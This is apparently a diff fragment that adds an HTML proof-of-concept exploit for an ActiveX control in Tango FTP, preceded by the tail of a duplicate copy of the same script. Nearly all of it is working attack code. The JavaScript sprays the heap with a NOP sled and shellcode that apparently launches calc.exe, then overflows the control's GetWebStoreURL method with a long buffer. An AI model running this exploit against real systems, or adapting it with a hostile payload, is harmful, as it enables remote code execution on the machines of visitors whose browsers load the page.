{
while (sprayContainer.length*2<sprayContainerSize)
{
sprayContainer += sprayContainer;
}
sprayContainer = sprayContainer.substring(0,sprayContainerSize/2);
return (sprayContainer);
}
var heapBlockSize = 0x500000;
var SizeOfHeap = 0x30;
var payLoadSize = (heapspray.length * 2);
var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap);
var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sprayContainer + heapspray;
}
</SCRIPT>
</BODY>
</HTML>


@ -0,0 +1,72 @@
<HTML>
<BODY>
<input language=JavaScript onclick=Tryme() type=button value="Launch Calc">
<object id=boom classid="clsid:{25982EAA-87CC-4747-BE09-9913CF7DD2F1}"></object>
<br>Tango FTP Activex Heap Spray Exploit</br>
<br>Version:1.0(Build 136)</br>
<br>The vulnerability lies in the COM component used eSellerateControl350.dll (3.6.5.0) method of the ''GetWebStoreURL' member.</br>
<br>Vendor Homepage:http://www.tangoftp.com/index.html</br>
<br>Software Link:http://www.tangoftp.com/downloads/index.html</br>
<br>Author: metacom</br>
<!--Video Poc:http://bit.ly/1fjtq89 -->
<SCRIPT>
var heapspray=unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
var sprayContainer = unescape("%u9090%u9090");
var heapToAddress = 0x0a0a0a0a;
function Tryme()
{
var size_buff = 5000;
var x = unescape("%0a%0a%0a%0a");
while (x.length<size_buff) x += x;
x = x.substring(0,size_buff);
boom.GetWebStoreURL(x, 1);
}
function getsprayContainer(sprayContainer, sprayContainerSize)
{
while (sprayContainer.length*2<sprayContainerSize)
{
sprayContainer += sprayContainer;
}
sprayContainer = sprayContainer.substring(0,sprayContainerSize/2);
return (sprayContainer);
}
var heapBlockSize = 0x500000;
var SizeOfHeap = 0x30;
var payLoadSize = (heapspray.length * 2);
var sprayContainerSize = heapBlockSize - (payLoadSize + SizeOfHeap);
var heapBlocks = (heapToAddress+heapBlockSize)/heapBlockSize;
var memory = new Array();
sprayContainer = getsprayContainer(sprayContainer,sprayContainerSize);
for (i=0;i<heapBlocks;i++)
{
memory[i] = sprayContainer + heapspray;
}
</SCRIPT>
</BODY>
</HTML>